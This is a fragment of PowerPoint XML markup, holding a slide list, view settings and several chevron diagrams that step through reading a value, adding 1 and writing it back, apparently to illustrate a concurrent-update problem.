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113"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId114"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="261" r:id="rId2"/>
    <p:sldId id="386" r:id="rId3"/>
    <p:sldId id="279" r:id="rId4"/>
    <p:sldId id="280" r:id="rId5"/>
    <p:sldId id="360" r:id="rId6"/>
    <p:sldId id="282" r:id="rId7"/>
    <p:sldId id="372" r:id="rId8"/>
    <p:sldId id="361" r:id="rId9"/>
    <p:sldId id="362" r:id="rId10"/>
    <p:sldId id="283" r:id="rId11"/>
    <p:sldId id="303" r:id="rId12"/>
    <p:sldId id="373" r:id="rId13"/>
    <p:sldId id="363" r:id="rId14"/>
    <p:sldId id="284" r:id="rId15"/>
    <p:sldId id="333" r:id="rId16"/>
    <p:sldId id="285" r:id="rId17"/>
    <p:sldId id="374" r:id="rId18"/>
    <p:sldId id="304" r:id="rId19"/>
    <p:sldId id="375" r:id="rId20"/>
    <p:sldId id="286" r:id="rId21"/>
    <p:sldId id="305" r:id="rId22"/>
    <p:sldId id="287" r:id="rId23"/>
    <p:sldId id="308" r:id="rId24"/>
    <p:sldId id="376" r:id="rId25"/>
    <p:sldId id="288" r:id="rId26"/>
    <p:sldId id="377" r:id="rId27"/>
    <p:sldId id="307" r:id="rId28"/>
    <p:sldId id="378" r:id="rId29"/>
    <p:sldId id="364" r:id="rId30"/>
    <p:sldId id="365" r:id="rId31"/>
    <p:sldId id="379" r:id="rId32"/>
    <p:sldId id="366" r:id="rId33"/>
    <p:sldId id="367" r:id="rId34"/>
    <p:sldId id="289" r:id="rId35"/>
    <p:sldId id="278" r:id="rId36"/>
    <p:sldId id="368" r:id="rId37"/>
    <p:sldId id="309" r:id="rId38"/>
    <p:sldId id="290" r:id="rId39"/>
    <p:sldId id="276" r:id="rId40"/>
    <p:sldId id="387" r:id="rId41"/>
    <p:sldId id="291" r:id="rId42"/>
    <p:sldId id="292" r:id="rId43"/>
    <p:sldId id="369" r:id="rId44"/>
    <p:sldId id="370" r:id="rId45"/>
    <p:sldId id="294" r:id="rId46"/>
    <p:sldId id="293" r:id="rId47"/>
    <p:sldId id="295" r:id="rId48"/>
    <p:sldId id="296" r:id="rId49"/>
    <p:sldId id="332" r:id="rId50"/>
    <p:sldId id="297" r:id="rId51"/>
    <p:sldId id="380" r:id="rId52"/>
    <p:sldId id="298" r:id="rId53"/>
    <p:sldId id="299" r:id="rId54"/>
    <p:sldId id="381" r:id="rId55"/>
    <p:sldId id="300" r:id="rId56"/>
    <p:sldId id="301" r:id="rId57"/>
    <p:sldId id="331" r:id="rId58"/>
    <p:sldId id="302" r:id="rId59"/>
    <p:sldId id="382" r:id="rId60"/>
    <p:sldId id="310" r:id="rId61"/>
    <p:sldId id="383" r:id="rId62"/>
    <p:sldId id="314" r:id="rId63"/>
    <p:sldId id="384" r:id="rId64"/>
    <p:sldId id="315" r:id="rId65"/>
    <p:sldId id="330" r:id="rId66"/>
    <p:sldId id="311" r:id="rId67"/>
    <p:sldId id="328" r:id="rId68"/>
    <p:sldId id="316" r:id="rId69"/>
    <p:sldId id="317" r:id="rId70"/>
    <p:sldId id="318" r:id="rId71"/>
    <p:sldId id="319" r:id="rId72"/>
    <p:sldId id="329" r:id="rId73"/>
    <p:sldId id="320" r:id="rId74"/>
    <p:sldId id="313" r:id="rId75"/>
    <p:sldId id="321" r:id="rId76"/>
    <p:sldId id="322" r:id="rId77"/>
    <p:sldId id="323" r:id="rId78"/>
    <p:sldId id="324" r:id="rId79"/>
    <p:sldId id="325" r:id="rId80"/>
    <p:sldId id="326" r:id="rId81"/>
    <p:sldId id="327" r:id="rId82"/>
    <p:sldId id="335" r:id="rId83"/>
    <p:sldId id="336" r:id="rId84"/>
    <p:sldId id="385" r:id="rId85"/>
    <p:sldId id="337" r:id="rId86"/>
    <p:sldId id="371" r:id="rId87"/>
    <p:sldId id="338" r:id="rId88"/>
    <p:sldId id="339" r:id="rId89"/>
    <p:sldId id="340" r:id="rId90"/>
    <p:sldId id="341" r:id="rId91"/>
    <p:sldId id="342" r:id="rId92"/>
    <p:sldId id="343" r:id="rId93"/>
    <p:sldId id="344" r:id="rId94"/>
    <p:sldId id="345" r:id="rId95"/>
    <p:sldId id="346" r:id="rId96"/>
    <p:sldId id="347" r:id="rId97"/>
    <p:sldId id="334" r:id="rId98"/>
    <p:sldId id="388"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260"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6" autoAdjust="0"/>
    <p:restoredTop sz="86458" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="74" d="100"/>
          <a:sy n="74" d="100"/>
        </p:scale>
        <p:origin x="870" y="60"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-159828"/>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65EEB-4364-4F00-A0F5-058D9BDC529B}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{334C5C61-7004-42C5-A096-9C606EDED8D6}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Read Value</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>(It is 0)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A00439A2-6497-499A-8137-60E12463CFF9}" type="parTrans" cxnId="{54E1C196-CE8E-4E35-8224-E4912ACC56C9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6047B765-4B38-4702-868C-2AA035604A24}" type="sibTrans" cxnId="{54E1C196-CE8E-4E35-8224-E4912ACC56C9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7DED0A38-E0D5-40D3-9DE9-3B7DA6537452}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Add 1</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>(It will be 1)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE88AF6F-6AE4-4F14-BE94-BC9B56F08EDA}" type="parTrans" cxnId="{54E06B58-A6D8-44DE-B2FD-9045FC38738B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7376456E-7B6C-4EA1-AC04-682E6D6876E2}" type="sibTrans" cxnId="{54E06B58-A6D8-44DE-B2FD-9045FC38738B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C3460EF8-3560-468B-83D3-4D8C887ABC96}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Write Value</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>(It is 1)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F6032EF-B84F-4284-BB14-D161403E3438}" type="parTrans" cxnId="{DC19E45E-5410-41D1-86BC-6A5B43D37C39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D6CC16B-D9FD-48CD-B138-4B5D67573E38}" type="sibTrans" cxnId="{DC19E45E-5410-41D1-86BC-6A5B43D37C39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" type="pres">
      <dgm:prSet presAssocID="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F6616365-51C9-4546-92C4-04684C241DC3}" type="pres">
      <dgm:prSet presAssocID="{334C5C61-7004-42C5-A096-9C606EDED8D6}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D13D5F38-FB17-4D84-A9A5-EBF9B8E073F0}" type="pres">
      <dgm:prSet presAssocID="{6047B765-4B38-4702-868C-2AA035604A24}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8CCD4FE7-C618-4D45-9F7C-4F1B9FE4FBAD}" type="pres">
      <dgm:prSet presAssocID="{7DED0A38-E0D5-40D3-9DE9-3B7DA6537452}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5DDAD8F9-2924-4AB2-8B4B-790AE9FB27C1}" type="pres">
      <dgm:prSet presAssocID="{7376456E-7B6C-4EA1-AC04-682E6D6876E2}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{12905F27-33D8-43E2-91E5-3AD8D8A2A0CD}" type="pres">
      <dgm:prSet presAssocID="{C3460EF8-3560-468B-83D3-4D8C887ABC96}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{632AF404-CF73-416E-8FBE-4B89681B481F}" type="presOf" srcId="{334C5C61-7004-42C5-A096-9C606EDED8D6}" destId="{F6616365-51C9-4546-92C4-04684C241DC3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{6D756D0F-038D-4349-8CE9-4BA76C9E2B29}" type="presOf" srcId="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" destId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{DC19E45E-5410-41D1-86BC-6A5B43D37C39}" srcId="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" destId="{C3460EF8-3560-468B-83D3-4D8C887ABC96}" srcOrd="2" destOrd="0" parTransId="{8F6032EF-B84F-4284-BB14-D161403E3438}" sibTransId="{5D6CC16B-D9FD-48CD-B138-4B5D67573E38}"/>
    <dgm:cxn modelId="{20AED961-C227-4B2C-8B02-BD970F9B9BA4}" type="presOf" srcId="{C3460EF8-3560-468B-83D3-4D8C887ABC96}" destId="{12905F27-33D8-43E2-91E5-3AD8D8A2A0CD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{54E06B58-A6D8-44DE-B2FD-9045FC38738B}" srcId="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" destId="{7DED0A38-E0D5-40D3-9DE9-3B7DA6537452}" srcOrd="1" destOrd="0" parTransId="{DE88AF6F-6AE4-4F14-BE94-BC9B56F08EDA}" sibTransId="{7376456E-7B6C-4EA1-AC04-682E6D6876E2}"/>
    <dgm:cxn modelId="{54E1C196-CE8E-4E35-8224-E4912ACC56C9}" srcId="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" destId="{334C5C61-7004-42C5-A096-9C606EDED8D6}" srcOrd="0" destOrd="0" parTransId="{A00439A2-6497-499A-8137-60E12463CFF9}" sibTransId="{6047B765-4B38-4702-868C-2AA035604A24}"/>
    <dgm:cxn modelId="{89E535B8-1017-46D7-BEB5-D0D6460AE5C4}" type="presOf" srcId="{7DED0A38-E0D5-40D3-9DE9-3B7DA6537452}" destId="{8CCD4FE7-C618-4D45-9F7C-4F1B9FE4FBAD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{7E236EAD-4882-4B9E-98A8-AC1ED53FC545}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{F6616365-51C9-4546-92C4-04684C241DC3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{D2039FD5-3481-401E-BC99-D179492A3C4C}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{D13D5F38-FB17-4D84-A9A5-EBF9B8E073F0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{F25E6200-A1AB-4290-A7D9-776189932387}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{8CCD4FE7-C618-4D45-9F7C-4F1B9FE4FBAD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{E7E49A33-1B7F-49F8-8B72-27E177EC5665}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{5DDAD8F9-2924-4AB2-8B4B-790AE9FB27C1}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{5E5D3EE7-0A9A-4EA1-8FB1-24CA12DE7D01}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{12905F27-33D8-43E2-91E5-3AD8D8A2A0CD}"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065EEB-4364-4F00-A0F5-058D9BDC529B}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{334C5C61-7004-42C5-A096-9C606EDED8D6}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Read Value</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>(It is 1)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A00439A2-6497-499A-8137-60E12463CFF9}" type="parTrans" cxnId="{54E1C196-CE8E-4E35-8224-E4912ACC56C9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6047B765-4B38-4702-868C-2AA035604A24}" type="sibTrans" cxnId="{54E1C196-CE8E-4E35-8224-E4912ACC56C9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7DED0A38-E0D5-40D3-9DE9-3B7DA6537452}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Add 1</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>(It will be 2)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE88AF6F-6AE4-4F14-BE94-BC9B56F08EDA}" type="parTrans" cxnId="{54E06B58-A6D8-44DE-B2FD-9045FC38738B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7376456E-7B6C-4EA1-AC04-682E6D6876E2}" type="sibTrans" cxnId="{54E06B58-A6D8-44DE-B2FD-9045FC38738B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C3460EF8-3560-468B-83D3-4D8C887ABC96}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Write Value</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>(It is now 2)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F6032EF-B84F-4284-BB14-D161403E3438}" type="parTrans" cxnId="{DC19E45E-5410-41D1-86BC-6A5B43D37C39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D6CC16B-D9FD-48CD-B138-4B5D67573E38}" type="sibTrans" cxnId="{DC19E45E-5410-41D1-86BC-6A5B43D37C39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" type="pres">
      <dgm:prSet presAssocID="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F6616365-51C9-4546-92C4-04684C241DC3}" type="pres">
      <dgm:prSet presAssocID="{334C5C61-7004-42C5-A096-9C606EDED8D6}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D13D5F38-FB17-4D84-A9A5-EBF9B8E073F0}" type="pres">
      <dgm:prSet presAssocID="{6047B765-4B38-4702-868C-2AA035604A24}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8CCD4FE7-C618-4D45-9F7C-4F1B9FE4FBAD}" type="pres">
      <dgm:prSet presAssocID="{7DED0A38-E0D5-40D3-9DE9-3B7DA6537452}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5DDAD8F9-2924-4AB2-8B4B-790AE9FB27C1}" type="pres">
      <dgm:prSet presAssocID="{7376456E-7B6C-4EA1-AC04-682E6D6876E2}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{12905F27-33D8-43E2-91E5-3AD8D8A2A0CD}" type="pres">
      <dgm:prSet presAssocID="{C3460EF8-3560-468B-83D3-4D8C887ABC96}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{632AF404-CF73-416E-8FBE-4B89681B481F}" type="presOf" srcId="{334C5C61-7004-42C5-A096-9C606EDED8D6}" destId="{F6616365-51C9-4546-92C4-04684C241DC3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{6D756D0F-038D-4349-8CE9-4BA76C9E2B29}" type="presOf" srcId="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" destId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{DC19E45E-5410-41D1-86BC-6A5B43D37C39}" srcId="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" destId="{C3460EF8-3560-468B-83D3-4D8C887ABC96}" srcOrd="2" destOrd="0" parTransId="{8F6032EF-B84F-4284-BB14-D161403E3438}" sibTransId="{5D6CC16B-D9FD-48CD-B138-4B5D67573E38}"/>
    <dgm:cxn modelId="{20AED961-C227-4B2C-8B02-BD970F9B9BA4}" type="presOf" srcId="{C3460EF8-3560-468B-83D3-4D8C887ABC96}" destId="{12905F27-33D8-43E2-91E5-3AD8D8A2A0CD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{54E06B58-A6D8-44DE-B2FD-9045FC38738B}" srcId="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" destId="{7DED0A38-E0D5-40D3-9DE9-3B7DA6537452}" srcOrd="1" destOrd="0" parTransId="{DE88AF6F-6AE4-4F14-BE94-BC9B56F08EDA}" sibTransId="{7376456E-7B6C-4EA1-AC04-682E6D6876E2}"/>
    <dgm:cxn modelId="{54E1C196-CE8E-4E35-8224-E4912ACC56C9}" srcId="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" destId="{334C5C61-7004-42C5-A096-9C606EDED8D6}" srcOrd="0" destOrd="0" parTransId="{A00439A2-6497-499A-8137-60E12463CFF9}" sibTransId="{6047B765-4B38-4702-868C-2AA035604A24}"/>
    <dgm:cxn modelId="{89E535B8-1017-46D7-BEB5-D0D6460AE5C4}" type="presOf" srcId="{7DED0A38-E0D5-40D3-9DE9-3B7DA6537452}" destId="{8CCD4FE7-C618-4D45-9F7C-4F1B9FE4FBAD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{7E236EAD-4882-4B9E-98A8-AC1ED53FC545}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{F6616365-51C9-4546-92C4-04684C241DC3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{D2039FD5-3481-401E-BC99-D179492A3C4C}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{D13D5F38-FB17-4D84-A9A5-EBF9B8E073F0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{F25E6200-A1AB-4290-A7D9-776189932387}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{8CCD4FE7-C618-4D45-9F7C-4F1B9FE4FBAD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{E7E49A33-1B7F-49F8-8B72-27E177EC5665}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{5DDAD8F9-2924-4AB2-8B4B-790AE9FB27C1}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{5E5D3EE7-0A9A-4EA1-8FB1-24CA12DE7D01}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{12905F27-33D8-43E2-91E5-3AD8D8A2A0CD}"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065EEB-4364-4F00-A0F5-058D9BDC529B}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{334C5C61-7004-42C5-A096-9C606EDED8D6}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Read Value</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>(It is 0)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A00439A2-6497-499A-8137-60E12463CFF9}" type="parTrans" cxnId="{54E1C196-CE8E-4E35-8224-E4912ACC56C9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6047B765-4B38-4702-868C-2AA035604A24}" type="sibTrans" cxnId="{54E1C196-CE8E-4E35-8224-E4912ACC56C9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7DED0A38-E0D5-40D3-9DE9-3B7DA6537452}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Add 1</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>(Makes 1)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE88AF6F-6AE4-4F14-BE94-BC9B56F08EDA}" type="parTrans" cxnId="{54E06B58-A6D8-44DE-B2FD-9045FC38738B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7376456E-7B6C-4EA1-AC04-682E6D6876E2}" type="sibTrans" cxnId="{54E06B58-A6D8-44DE-B2FD-9045FC38738B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
